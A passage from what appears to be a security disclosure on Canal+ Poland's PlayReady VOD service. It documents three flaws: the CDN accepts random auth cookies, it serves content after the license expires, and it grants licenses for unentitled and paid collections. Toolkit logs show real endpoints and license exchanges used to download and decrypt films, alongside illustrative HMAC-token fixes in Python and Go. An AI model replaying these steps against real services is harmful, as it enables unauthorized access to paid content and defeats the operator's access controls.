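# Constructed secret for the example; the real VOD_SECRET and the X-nBox-Code
# cookie algorithm are not known from the README and are not reproduced here.
EXAMPLE_SECRET = b"constructed-example-secret"
LICENSE_EXPIRY = 1_656_498_581   # constructed epoch value standing in for 2022-06-29T10:29:41


@dataclass(frozen=True)
class CdnRequest:
    serial: str    # STB serial number the client claims to be
    asset_id: str  # asset the requested fragment belongs to
    cookie: str    # X-nBox-Code value sent by the client (hypothetical token format below)


def weak_authorize(req):
    """Behaviour observed in Scenario 3: any non-empty cookie value is accepted."""
    return "ok" if req.cookie else "missing cookie"


def _b64(raw):
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(secret, serial, asset_id, expires_at):
    """Token the license server would mint together with a license: an HMAC over the
    device serial, the asset id and the license expiry, so the CDN can check all three."""
    payload = f"{serial}|{asset_id}|{expires_at}".encode()
    mac = hmac.new(secret, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(mac)


def strong_authorize(secret, req, now):
    """Reject anything that is not a valid, unexpired token for this exact serial and asset."""
    parts = req.cookie.split(".")
    if len(parts) != 2:
        return "malformed token"
    try:
        payload, mac = _unb64(parts[0]), _unb64(parts[1])
    except (binascii.Error, ValueError):
        return "malformed token"
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):   # constant-time; False on length mismatch
        return "bad signature"
    fields = payload.decode(errors="replace").split("|")
    if len(fields) != 3 or not fields[2].isdigit():
        return "malformed token"
    serial, asset_id, expires_at = fields
    if serial != req.serial:
        return "serial mismatch"
    if asset_id != req.asset_id:
        return "asset mismatch"
    if now >= int(expires_at):
        return "license expired"
    return "ok"


def demo():
    """Run the cases the README describes against both checks; returns {case: verdict}."""
    serial = "STB00000000001ABC"                # constructed serial
    asset = "ctitmim529714"
    legit = issue_token(EXAMPLE_SECRET, serial, asset, LICENSE_EXPIRY)
    forged = issue_token(b"guessed-secret", serial, asset, LICENSE_EXPIRY)
    during = LICENSE_EXPIRY - 3600              # constructed: inside the license window
    after = LICENSE_EXPIRY + 21 * 86400         # constructed: three weeks later, as in Scenario 4
    return {
        "weak_random_cookie": weak_authorize(CdnRequest(serial, asset, "random-value")),
        "strong_legit": strong_authorize(EXAMPLE_SECRET, CdnRequest(serial, asset, legit), during),
        "strong_random_cookie": strong_authorize(EXAMPLE_SECRET, CdnRequest(serial, asset, "random-value"), during),
        "strong_forged": strong_authorize(EXAMPLE_SECRET, CdnRequest(serial, asset, forged), during),
        "strong_reversed_serial": strong_authorize(EXAMPLE_SECRET, CdnRequest(serial[::-1], asset, legit), during),
        "strong_after_expiry": strong_authorize(EXAMPLE_SECRET, CdnRequest(serial, asset, legit), after),
    }


if __name__ == "__main__":
    for case, verdict in demo().items():
        print(f"{case:24s} -> {verdict}")
```

The order of the checks matters: the signature is verified before any field of the payload is trusted, the comparison is constant-time, and the expiry carried inside the token is the license expiry, so the CDN needs no live call to the license server to refuse a request made after the license has lapsed.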
Although the CDN relies on:

- a `VOD_SECRET` value defined by the VOD web application,
- a secret algorithm for computing the `X-nBox-Code` cookie,

these do not matter, as a random value used in place of the `X-nBox-Code` cookie can be successfully used to access CDN content. This is illustrated below:

```
c:\_TRANSFER\MSPRNCP\toolkit>shell
# MS Play Ready / Canal+ VOD toolkit
# (c) Security Explorations 2016-2019 Poland
# (c) AG Security Research 2019-2022 Poland
loaded cdn [CDN helper]
loaded mspr [MS Play Ready toolkit]
loaded vod [CANALP VOD toolkit]
loaded cgaweb [CANALP CGAWeb toolkit]
msprcp> set CDN_NOAUTH 1
msprcp> downmp4 -A ctitnod570826 -a audio=Polski.0 -v video=0 -t 1:0+4
- parsing args
audio name: Polski
audio quality: q0
video quality: q0
- loading cached manifest
start time: 60 sec
duration: 4 sec
Downloading 3 fragments
[###############################]
msprcp> makemp4 -A ctitnod570826 -a audio=Polski.0 -v video=0 -t 1:0+4
- parsing args
audio name: Polski
audio quality: q0
video quality: q0
- loading cached manifest
start time: 60 sec
duration: 4 sec
audio track id: 2
video_track_id: 1
- loading cached content key
Processing (decrypt / append) 3 fragments
[###############################]
total A/V data: 409605
msprcp>
```

### SCENARIO 4 - NO SYNC OF CDN WITH PLAYREADY LICENSE SERVER

The license acquired in Scenario 1 indicated an expiration date of 2022-06-29:

```
CUSTOM DATA
UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb
BrandGuid: 448ab54c-d127-45f6-b651-4c59aee2f431
LicenseType: NonPersistent
BeginDate: 2022-06-27T10:29:41.2331761
ExpirationDate: 2022-06-29T10:29:41.2331761
ErrorCode: 0
TransactionId: auto:56
```

It was verified that the content for the `ctitmim529714` asset could still be obtained past this date (successful `downmp4` and `makemp4` commands issued on Jul 20, 2022).
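Scenarios 3 and 4 together describe the gap: the CDN accepts a random `X-nBox-Code` and keeps serving fragments long after the license has expired, because nothing ties a fragment request to a granted license. The following Go program is an added illustration (not part of the toolkit or of the operator's systems) of one way to close that gap: the license server hands out fragment URLs carrying an HMAC token bound to the asset's KID, the device serial and an expiry, and the CDN edge recomputes the token before serving. The shared secret, the path, the KID and the serial used in `main` are constructed values.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"net/url"
	"strconv"
)

// token binds a fragment path to the asset's KID, the requesting device and
// an expiry with an HMAC under a secret shared by license server and CDN edge.
func token(secret []byte, path, kid, serial string, expiry int64) string {
	mac := hmac.New(sha256.New, secret)
	fmt.Fprintf(mac, "%s|%s|%s|%d", path, kid, serial, expiry)
	return hex.EncodeToString(mac.Sum(nil))
}

// MintFragmentURL is what a license server would hand out together with a
// granted license: the real CDN path plus expiry and device binding. Without
// a granted license no URL is ever produced, so there is nothing to harvest.
func MintFragmentURL(secret []byte, path, kid, serial string, expiry int64) string {
	v := url.Values{}
	v.Set("e", strconv.FormatInt(expiry, 10))
	v.Set("d", serial)
	v.Set("t", token(secret, path, kid, serial, expiry))
	return path + "?" + v.Encode()
}

// CheckFragmentURL is the edge-side check. The KID is the one the edge knows
// for the asset it serves (from the packaged content's protection header),
// not a value taken from the request, so a URL minted for one asset cannot be
// replayed against another. The expiry mirrors the license lifetime, which
// closes the Scenario 4 gap of downloads long after ExpirationDate.
func CheckFragmentURL(secret []byte, raw, kid string, now int64) error {
	u, err := url.Parse(raw)
	if err != nil {
		return err
	}
	q := u.Query()
	expiry, err := strconv.ParseInt(q.Get("e"), 10, 64)
	if err != nil {
		return errors.New("malformed expiry")
	}
	if now > expiry {
		return errors.New("token expired")
	}
	want := token(secret, u.Path, kid, q.Get("d"), expiry)
	if !hmac.Equal([]byte(q.Get("t")), []byte(want)) {
		return errors.New("bad token")
	}
	return nil
}

func main() {
	// Constructed values: the secret, path, KID and serial are not taken from any real system.
	secret := []byte("assumed-secret-shared-by-license-server-and-edge")
	path := "/vod/ASSET.ism/QualityLevels(400000)/Fragments(video=0)"
	kid := "00112233445566778899aabbccddeeff" // KID of the asset, as the edge knows it
	u := MintFragmentURL(secret, path, kid, "DGBD0123456789ABC", 1000) // expiry = license ExpirationDate
	fmt.Println(u)
	fmt.Println("before expiry:", CheckFragmentURL(secret, u, kid, 999))
	fmt.Println("after expiry: ", CheckFragmentURL(secret, u, kid, 1001))
	fmt.Println("other asset:  ", CheckFragmentURL(secret, u, "ffffffffffffffffffffffffffffffff", 999))
}
```

The design choice worth noting is that the edge never trusts a KID or expiry supplied by the client on its own: the expiry is only honored because it is covered by the HMAC, and the KID is the edge's own view of the asset.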
This indicates that there is no synchronization between the license server and the CDN: the CDN should be aware that there was no valid license for the device (serial number) requesting a given resource (being part of a given asset).

### SCENARIO 5 (NO AUTH FOR LICENSE ACQUISITION)

While the STB client device should have limited access to VOD collections, it was verified that it could access any of them. For instance, no access should be possible to assets from the `CANAL+ Premium` collection (in the listing below, `*` presumably marks the collections the test device is entitled to):

```
[VOD LIBRARY]
COL01   "PREMIERY VOD+" [Film]
COL02   "CANAL+ Premium"
COL03 * "ALE KINO+"
COL04   "Movies Fun"
COL05   "FOX PLAY"
COL06   "FilmBox Live"
COL07   "AXN NOW"
COL08   "KINO ŚWIAT"
COL09 * "ROMANCE TV"
COL0a * "NOVELAS+"
...
```

Yet, license acquisition and content download were successful, as indicated by the following log:

```
msprcp> lscol COL02 2
ASSETS from 2/119 pages
ctitcap591362 "[REC] 2"
ctitcap572470 "[REC] 4: Apokalipsa"
ctitcap596078 "@MIRIAMFROMPOLAND"
ctitcap595998 "#Happy. Dyktatura szczęścia w mediach społecznościowych"
ctitcap591410 "10 dni z tatą"
ctitcap567613 "11 Minut"
ctitcap565254 "11 września - historie ocalałych"
ctitcap572390 "13 grzechów"
ctitcap505229 "13 Posterunek sezon II odc. 1"
ctitcap505297 "13 Posterunek sezon II odc. 10"
ctitcap505296 "13 Posterunek sezon II odc. 11"
...
ctitcap567319 "303. Bitwa o Anglię"
msprcp> colasset ctitcap567319
ctitcap567319 "303. Bitwa o Anglię"
link: https://nvs1.ncplus.pl/go-stb/static/stb_content.json?productId%3D567319
ls_url: https://lsp1.ncplus.pl/kms/proxy
msprcp> storeasset ctitcap567319
asset data stored to: content\ctitcap567319
msprcp> maninfo -A ctitcap567319
- downloading manifest
MANIFEST: content\ctitcap567319\Manifest.ism
SmoothStreamingMedia
MajorVersion: 2
MinorVersion: 0
TimeScale: 10000000
Duration: 61642880000 [1h 42m 3644s]
ProtectionHeader
SystemID: 9A04F079-9840-4286-AB92-E65BE0885F95
WRMHEADER
keylen: 16
algid: AESCTR
kid
0000: bd 06 d6 db 2b c3 a5 43 a5 94 cf 8d 1c 1b e7 ee  ....+..C........
la_url: https://api-ncplus.drm.insyscd.net/rightsmanager.asmx ds_id: 0000: 79 f0 04 9a 40 98 86 42 ab 92 e6 5b e0 88 5f 95 y...@..B...[.._. StreamIndex Type: audio Name: Oryginalny TimeScale: 10000000 Chunks: 3083 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Oryginalny={start time}) QualityLevel Index: 0 Bitrate: 125435 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: audio Name: Polski TimeScale: 10000000 Chunks: 3083 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(Polski={start time}) QualityLevel Index: 0 Bitrate: 125435 FourCC: AACL CodecPrivateData: 1190 SamplingRate: 48000 Channels: 2 BitsPerSample: 16 PacketSize: 4 AudioTag: 255 StreamIndex Type: text Name: text-1 TimeScale: 10000000 Chunks: 99 QualityLevels: 1 Url: QualityLevels({bitrate})/Fragments(text-1={start time}) StreamIndex Type: video Name: video TimeScale: 10000000 Chunks: 3083 QualityLevels: 5 Url: QualityLevels({bitrate})/Fragments(video={start time}) QualityLevel Index: 0 Bitrate: 400000 FourCC: AVC1 CodecPrivateData: 000000016742C015D901E08FEB01100000030010000003032E200030D400086478A8C01E2C5C900000000168CB8DC8 MaxWidth: 480 MaxHeight: 270 QualityLevel Index: 1 Bitrate: 600000 FourCC: AVC1 CodecPrivateData: 000000016742C01ED900C83BF88C0440000003004000000CB80800249F00064978A8C01E2C5C900000000168CB8DC8 MaxWidth: 800 MaxHeight: 450 QualityLevel Index: 2 Bitrate: 1000000 FourCC: AVC1 CodecPrivateData: 000000016742C01FD90040049B01100000030010000003032E06000F4240029FF8A8C01E3064900000000168CB8DC8 MaxWidth: 1024 MaxHeight: 576 QualityLevel Index: 3 Bitrate: 2000000 FourCC: AVC1 CodecPrivateData: 00000001674D401FF200A00B76022000000300200000065C50001E8480053FF151803C60C4480000000168EBEDC8 MaxWidth: 1280 MaxHeight: 720 QualityLevel Index: 4 Bitrate: 2499968 FourCC: AVC1 CodecPrivateData: 000000016764001FACE4014016EC0440000003004000000CB8100009896000347DE2A30078C188900000000168EBEDC9C0 MaxWidth: 1280 
MaxHeight: 720 msprcp> getlicense -A ctitcap567319 generating new cert, device changed or not initialized - loading cached manifest - generating license req XML key (AES/CBC) iv 0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5 Hi......0.,.].n. key 0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a W|y.........'... nonce 0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34 mQ(*.....4/...E4 NONCE bVEoKtjFGqfMNC8DHIlFNA== KEYDATA /3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A= CIPHERDATA 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 XML DIGEST ZMj1qVj+OplxpH8AtNtbaqlRtiSGETtvBC1Lo7Pg8yY= ecdsa digest 0000: 0c fb 3c 7b a1 a9 8a 6c b2 9a 4a c9 81 87 df cf ..<{...l..J..... 0010: 51 4b ea f9 91 d9 f4 98 0a 14 74 86 2a 7c eb ce QK........t.*|.. signature - r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6 - s: b6452b7000129732b2ddad686c23a6b139bcefad6c44d1586f569676cfacec42 XML SIGNATURE J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqa2RStwABKXMrLdrWhsI6axObzvrWxE0VhvVpZ2z6zsQg== PUBKEY HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ== - sending license req to: https://lsp1.ncplus.pl/kms/proxy LICENSE CUSTOM DATA UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb BrandGuid: 448ab54c-d127-45f6-b651-4c59aee2f431 LicenseType: NonPersistent BeginDate: 2022-07-19T09:50:53.9910965 ExpirationDate: 2022-07-21T09:50:53.9910965 ErrorCode: 0 TransactionId: auto:56 XMR LICENSE version: 3 attr: 0001 OuterContainer attr: 0036 Unknown data 0000: 00 00 00 39 00 00 00 18 d8 27 66 78 a6 c2 be 44 ...9.....'fx...D 0010: 8f 88 08 ae 25 5b 01 a7 ....%[.. attr: 0002 GlobalContainer attr: 000d Unknown data 0000: 00 01 .. 
attr: 0032 DWORD_Versioned data 0000: 00 00 00 41 ...A SecurityLevel level: SL2000 attr: 0009 KeyMaterialContainer ContentKey key_id 0000: bd 06 d6 db 2b c3 a5 43 a5 94 cf 8d 1c 1b e7 ee ....+..C........ v1: 1 v2: 3 enc_data_len: 0080 enc_data 0000: a1 a4 1a 99 d7 e1 fa 50 d6 dc 5a 4f 18 b2 b5 db .......P..ZO.... 0010: 0f d5 c9 01 67 a5 3a 7f 23 6c 80 df 3a d1 ce d8 ....g.:.#l..:... 0020: 25 ad f0 73 23 ce 2a 9b fd 4c b3 dd 18 6f a9 53 %..s#.*..L...o.S 0030: 18 7a 99 6f 26 ce e8 aa 6b b4 99 3e d0 cd c8 36 .z.o&...k..>...6 0040: 79 d7 f6 cb 92 17 c8 92 a9 59 9b 15 cc ef 43 f6 y........Y....C. 0050: 4b 8e ea ff e9 71 6d bb 95 1b 4a 6c 30 11 2c ed K....qm...Jl0.,. 0060: b2 0a 37 fe ab 24 e9 72 49 82 31 58 4f b3 38 86 ..7..$.rI.1XO.8. 0070: 1d 19 e7 64 13 a7 8a ea 1f 9f 35 61 02 f5 3f 0d ...d......5a..?. attr: 002a ECCDeviceKey data 0000: 00 01 00 40 d2 96 26 1e 5f 0b f2 4c c0 73 4d 76 ...@..&._..L.sMv 0010: c8 10 ac ef 7b 49 2c 16 04 07 8a 51 9c 6f 54 58 ....{I,....Q.oTX 0020: 6c bf be df ea a2 6c f7 29 cc 0f 74 75 d2 20 bd l.....l.)..tu... 0030: cf 64 fa 69 fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5 .d.i.....f...... 0040: 70 df ca 0d p... attr: 000b Signature data 0000: 00 01 00 10 f1 5a aa 51 0a 11 8c 9a cb 1f 7f 16 .....Z.Q........ 0010: 7c 27 ec df |'.. 
content_key
0000: *REMOVED*
msprcp> downmp4 -A ctitcap567319 -a audio=Oryginalny.0 -v video=4 -t 1:00+4
- parsing args
audio name: Oryginalny
audio quality: q0
video quality: q4
- loading cached manifest
start time: 60 sec
duration: 4 sec
Downloading 3 fragments
[###############################]
msprcp> makemp4 -A ctitcap567319 -a audio=Oryginalny.0 -v video=4 -t 1:00+4
- parsing args
audio name: Oryginalny
audio quality: q0
video quality: q4
- loading cached manifest
start time: 60 sec
duration: 4 sec
audio track id: 4
video_track_id: 8
- loading cached content key
Processing (decrypt / append) 3 fragments
[###############################]
total A/V data: 1979860
```

Successful license acquisition and content download were also verified for the `PREMIERY VOD+` collection, which normally requires a rental payment for each movie, as for the `ctitpre525597` asset (priced at 9.99 PLN):

```
msprcp> assetinfo -A ctitpre525597
TVOD ASSET
id: ctitpre525597
title: Alicja w krainie czarów (HD)
title_original: ALICE IN WONDERLAND
allow: 31.08.2022
year: 2010
duration: 104 min
price: 9.99 PLN
vat: 23
url: http://r.cdn-ncplus.pl/ncplusgo04-voddrm01/PRE_20027959/PRE_20027959.ism/Manifest
msprcp> getlicense -A ctitpre525597
- loading cached manifest
- generating license req
XML key (AES/CBC)
iv
0000: 48 69 b8 f5 a3 dc 1c ee 30 ea 2c 04 5d de 6e c5  Hi......0.,.].n.
key
0000: 57 7c 79 ad fd 93 be 07 c3 d9 09 e9 27 87 ed 8a  W|y.........'...
nonce 0000: 6d 51 28 2a d8 c5 1a a7 cc 34 2f 03 1c 89 45 34 mQ(*.....4/...E4 NONCE bVEoKtjFGqfMNC8DHIlFNA== KEYDATA /3xTymd6IO+C5+3oQgJT6FF6WaDGGs83MwOn3s1NI3PqZH7VPlTy3ZBxKT6+fRvRLa02Z5UvOBgCwlavlR2XFeaIQdwTUkP93T6ikwDWZXUWRvCUefpL1boUANTCok0z1slCtadY7se7ECHRz2BxenhcAfSTxmP+p1hoxNu+07A= CIPHERDATA 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 XML DIGEST AA8skfOk7kA9HQcijquMgirqKobrxjzyFWXJvrpa4GU= ecdsa digest 0000: 32 65 ed bb 1a ab 66 21 06 86 56 42 c8 0a e5 57 2e....f!..VB...W 0010: 69 52 1f ee 77 d8 0a ff 14 c9 9e 02 a4 c0 79 ae iR..w.........y. signature - r: 277ca8d09a8e5ceedb15c07e73acd8da0bfafcfedb683718b4f5e60cea0f72a6 - s: 124416970a533626a875f3550e2a3ebb3a3d15ea1404ceae361036732c9cc7ee XML SIGNATURE J3yo0JqOXO7bFcB+c6zY2gv6/P7baDcYtPXmDOoPcqYSRBaXClM2Jqh181UOKj67Oj0V6hQEzq42EDZzLJzH7g== PUBKEY HzRT52jiTwqGPAJgLRfkJM8Sj5ZrbSmnvnHxFInleK13N17+uumT8bvzebJ/HggAhv0bMOTPMzaCzKLiuO+coQ== - sending license req to: https://lsp1.ncplus.pl/kms/proxy LICENSE CUSTOM DATA UserToken: 135abf9b-7006-46f2-9b3f-52f5d79f361a-stb BrandGuid: 448ab54c-d127-45f6-b651-4c59aee2f431 LicenseType: NonPersistent BeginDate: 2022-07-19T10:06:29.3471657 ExpirationDate: 2022-07-21T10:06:29.3471657 ErrorCode: 0 TransactionId: auto:56 XMR LICENSE version: 3 attr: 0001 OuterContainer attr: 0036 Unknown data 0000: 00 00 00 39 00 00 00 18 d8 27 66 78 a6 c2 be 44 ...9.....'fx...D 0010: 8f 88 08 ae 25 5b 01 a7 ....%[.. attr: 0002 GlobalContainer attr: 000d Unknown data 0000: 00 01 .. attr: 0032 DWORD_Versioned data 0000: 00 00 00 41 ...A SecurityLevel level: SL2000 attr: 0009 KeyMaterialContainer ContentKey key_id 0000: 49 07 d5 7e 98 10 ea 4f 9f 3e ec d4 6a 30 96 9e I......O.>..j0.. v1: 1 v2: 3 enc_data_len: 0080 enc_data 0000: cd 3c 8f ad 99 6c 9f d6 4b 3d 71 f3 ba 30 8c 0e .<...l..K=q..0.. 0010: 97 0d f0 ea 0d f2 23 c7 bd 4f 4e ff a3 26 3e 5a ......#..ON..&>Z 0020: 2b e1 0c b2 f6 66 d9 33 13 17 86 18 73 45 28 56 +....f.3....sE(V 0030: 06 8e f1 a3 f4 ad e0 56 d3 9a 61 37 58 2c 7f 9a .......V..a7X,.. 0040: 68 f3 5d ee 28 f2 94 07 92 b7 fd 78 4d 37 dc 27 h.].(......xM7.' 
0050: f4 07 dd ba e6 4e 31 8e 80 c8 91 60 b0 93 55 68  .....N1.......Uh
0060: 09 8b 29 80 7b 4a 7c 19 ee 66 98 bb b2 45 fa 10  ..).{J|..f...E..
0070: d8 d3 94 a4 2e 80 06 02 c4 c4 69 a1 8c 14 40 17  ..........i...@.
attr: 002a ECCDeviceKey
data
0000: 00 01 00 40 d2 96 26 1e 5f 0b f2 4c c0 73 4d 76  ...@..&._..L.sMv
0010: c8 10 ac ef 7b 49 2c 16 04 07 8a 51 9c 6f 54 58  ....{I,....Q.oTX
0020: 6c bf be df ea a2 6c f7 29 cc 0f 74 75 d2 20 bd  l.....l.)..tu...
0030: cf 64 fa 69 fa 9e f2 80 c5 66 f0 83 c3 a0 80 d5  .d.i.....f......
0040: 70 df ca 0d                                      p...
attr: 000b Signature
data
0000: 00 01 00 10 59 95 f5 b4 55 1b c2 fc b1 07 45 83  ....Y...U.....E.
0010: 9e d8 55 0e                                      ..U.
content_key
0000: *REMOVED*
msprcp> downmp4 -A ctitpre525597 -a audio=Oryginalny.0 -v video=4 -t 1:00+4
- parsing args
audio name: Oryginalny
audio quality: q0
video quality: q4
- loading cached manifest
start time: 60 sec
duration: 4 sec
Downloading 3 fragments
[###############################]
msprcp> makemp4 -A ctitpre525597 -a audio=Oryginalny.0 -v video=4 -t 1:00+4
- parsing args
audio name: Oryginalny
audio quality: q0
video quality: q4
- loading cached manifest
start time: 60 sec
duration: 4 sec
audio track id: 3
video_track_id: 7
- loading cached content key
Processing (decrypt / append) 3 fragments
[###############################]
total A/V data: 1950835
```

All of the above implies that:

- no access checks are done with respect to the client device requesting a license to content,
- the whole VOD library could be compromised (18k+ assets in total).

